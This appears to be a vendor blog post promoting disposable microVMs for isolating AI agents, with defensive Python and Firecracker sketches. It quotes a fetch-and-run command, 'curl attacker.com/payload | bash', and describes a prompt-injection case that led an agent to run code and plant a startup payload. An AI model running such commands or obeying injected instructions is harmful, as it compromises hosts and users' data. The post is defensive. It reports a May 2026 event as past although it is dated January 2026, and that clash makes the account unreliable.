
January 27, 2026
The most capable AI agents need more than API access. They need to write code and run it. Browse the web. Install packages. Read and write files. Use command-line tools. In short, they need a computer.
The problem is obvious: giving an AI agent a computer means giving it the ability to execute arbitrary code. And that code is derived from natural language prompts, the most injection-prone input surface in computing. The agent is always one prompt injection away from curl attacker.com/payload | bash.
This is not a tail risk anymore. In its Top 10 for Agentic Applications (December 2025), OWASP put goal hijack and tool misuse at the top of the list precisely because hidden prompts have already turned production copilots into exfiltration engines. The answer is not to make the model perfectly obedient — it is to make the environment it runs in disposable. The diagram below shows the shape of the defense: the agent gets a real computer, but it is a sealed one.
Prompt injection leads to code generation, code generation leads to code execution, and unsandboxed code execution leads to data exfiltration, lateral movement, or persistent backdoors. The entire chain from “user message” to “compromised server” can happen in a single agent turn.
It's not hypothetical. In May 2026, Microsoft's own security team showed that a single injected prompt was enough to launch calc.exe on the host running an agent built on Semantic Kernel — and a related flaw let the agent write a payload straight into the Windows Startup folder. Their conclusion is the one that matters here: your LLM is not a security boundary, and any tool parameter the model can influence must be treated as attacker-controlled input. The agent faithfully executes injected instructions because it can't distinguish them from legitimate requests.
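One way to act on "treat every tool parameter as attacker-controlled" is to validate each argument before the tool touches the filesystem. The sketch below is a minimal illustration, not any framework's API: resolve_inside and UnsafeToolArgument are hypothetical names, and the workspace path is an assumption. It resolves a model-supplied path and refuses anything that lands outside the agent's workspace.

```python
from pathlib import Path


class UnsafeToolArgument(ValueError):
    """Raised when a model-supplied argument fails validation."""


def resolve_inside(workspace: Path, requested: str) -> Path:
    """Resolve a model-supplied path and refuse anything outside workspace.

    Hypothetical helper: `requested` is whatever string the model put in
    the tool call, so it is treated as hostile input.
    """
    root = workspace.resolve()
    # Joining with an absolute path discards `root`, and resolve() collapses
    # any ".." segments, so both tricks show up in the containment check.
    candidate = (root / requested).resolve()
    if not candidate.is_relative_to(root):  # requires Python 3.9+
        raise UnsafeToolArgument(f"path escapes workspace: {requested!r}")
    return candidate
```

A file-writing tool would call resolve_inside(workspace, path_from_model) first and only then open the result. Checks like this narrow what an injected prompt can reach, but they are still policy. They complement an isolated environment and do not replace it.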
Many agent sandboxing solutions still use containers. Containers share the host kernel. A kernel exploit from inside the container reaches the host and every other container on it. For untrusted code execution, this is the wrong isolation boundary.
Docker containers were designed for packaging and deployment, not for running hostile code. The isolation is process-level: namespaces and cgroups. These are software abstractions over a shared kernel. When the shared kernel has a vulnerability — and it regularly does — the isolation disappears.
Seccomp profiles and AppArmor help, but they are policy filters layered over a large, complex kernel interface. One missed syscall or one edge case in a filter, and escape becomes possible. For AI agents executing arbitrary, unpredictable code, you want the isolation boundary to be hardware, not policy.
VMs run their own kernel. The isolation is enforced by the CPU's virtualization extensions (Intel VT-x, AMD-V), not by software policy alone. A compromised guest has no direct access to the host kernel or to other VMs, and it reaches the network only through the virtual devices the host chooses to attach. There is no shared kernel to exploit. What remains exposed is the hypervisor and its device model, a far smaller surface than the full kernel syscall interface.
This is the same isolation model used by every major cloud provider to separate tenants. AWS, GCP, and Azure all use hardware virtualization as the trust boundary between customers. If it's good enough to separate competing enterprises on the same physical hardware, it's good enough for your AI agents.
The old objection — “VMs are too heavy to spin up per task” — no longer holds. Lightweight VM monitors like Firecracker boot a fresh guest in roughly 125 milliseconds with under 5 MiB of memory overhead per VM, which is why per-agent microVMs have become the default isolation model for hosted code-execution sandboxes. You get the security of a separate kernel at close to container-launch latency.
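As a rough sketch of how small a microVM definition can be, the function below builds a Firecracker JSON configuration as a Python dictionary. The key names follow Firecracker's configuration-file format as I understand it. The kernel and rootfs paths, the sizing defaults, and the function name are assumptions for illustration only.

```python
import json


def firecracker_config(kernel: str, rootfs: str,
                       vcpus: int = 1, mem_mib: int = 512) -> dict:
    """Build a minimal microVM definition (paths and sizes are placeholders)."""
    return {
        "boot-source": {
            "kernel_image_path": kernel,
            "boot_args": "console=ttyS0 reboot=k panic=1 pci=off",
        },
        "drives": [
            {
                "drive_id": "rootfs",
                "path_on_host": rootfs,
                "is_root_device": True,
                # Read-only root: the guest cannot modify the base image.
                "is_read_only": True,
            }
        ],
        "machine-config": {"vcpu_count": vcpus, "mem_size_mib": mem_mib},
        # No "network-interfaces" section, so the guest gets no NIC.
    }


if __name__ == "__main__":
    # Hypothetical image paths; substitute your own kernel and rootfs.
    print(json.dumps(
        firecracker_config("/images/vmlinux", "/images/agent-rootfs.ext4"),
        indent=2,
    ))
```

Written to a file, a definition like this can be passed to the firecracker binary with its --config-file option alongside --api-sock. Leaving out the network section is a deliberate choice here: an agent that only needs to run code on local files has no reason to reach the network at all.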
Build purpose-built VM images containing only what the agent needs. Deploy one per agent session. Destroy it when done. Every session starts from a clean, reproducible, minimal image with hardware-level isolation.
OpenFactory lets you define exactly what goes into the agent's VM.
The best security property of an agent VM is that it doesn't persist. Deploy from a clean image, run the task, destroy the VM. No state accumulates. No backdoors survive. Every session is a fresh start from a known-good baseline.
Traditional infrastructure fights to keep servers running. Agent infrastructure should fight to tear them down. The shorter the VM lives, the smaller the window for an attacker. The less state it accumulates, the less there is to exfiltrate.
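The deploy, run, destroy cycle maps naturally onto a context manager, so teardown happens even when the task crashes. The sketch below is a minimal illustration under stated assumptions: VMBackend is a hypothetical interface, not OpenFactory's or any hypervisor's API, and InMemoryBackend is a stand-in that only records calls.

```python
from contextlib import contextmanager
from typing import Iterator, Protocol


class VMBackend(Protocol):
    """Hypothetical interface; map these onto your real VM tooling."""

    def create(self, image: str) -> str: ...
    def destroy(self, vm_id: str) -> None: ...


@contextmanager
def ephemeral_vm(backend: VMBackend, image: str) -> Iterator[str]:
    """Boot a VM from a clean image and always destroy it afterwards."""
    vm_id = backend.create(image)
    try:
        yield vm_id
    finally:
        # Runs on success, on exceptions, and on cancellation alike,
        # so no session state outlives the task.
        backend.destroy(vm_id)


class InMemoryBackend:
    """Stand-in backend that only tracks which VMs are alive."""

    def __init__(self) -> None:
        self.live = set()
        self._counter = 0

    def create(self, image: str) -> str:
        self._counter += 1
        vm_id = f"vm-{self._counter}"
        self.live.add(vm_id)
        return vm_id

    def destroy(self, vm_id: str) -> None:
        self.live.discard(vm_id)
```

An agent loop would wrap each session in "with ephemeral_vm(backend, image) as vm_id:" and run every tool call against that VM. A real deployment would likely pair this with a hard time limit on the host side, since a finally block cannot help if the orchestrating process itself is killed.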
Describe your agent's requirements to OpenFactory — language runtimes, tools, security level — and get a deployable VM image in minutes. No Dockerfile, no Packer templates, no manual configuration.
Stop running AI agents on your production servers. Stop trusting containers to isolate untrusted code. Give your agents their own computers — isolated, disposable, and purpose-built.
OpenFactory's free flow is for browsing. Persistent VMs, SSH access, snapshots, your own ISO, and fleet deployment live on a paid plan.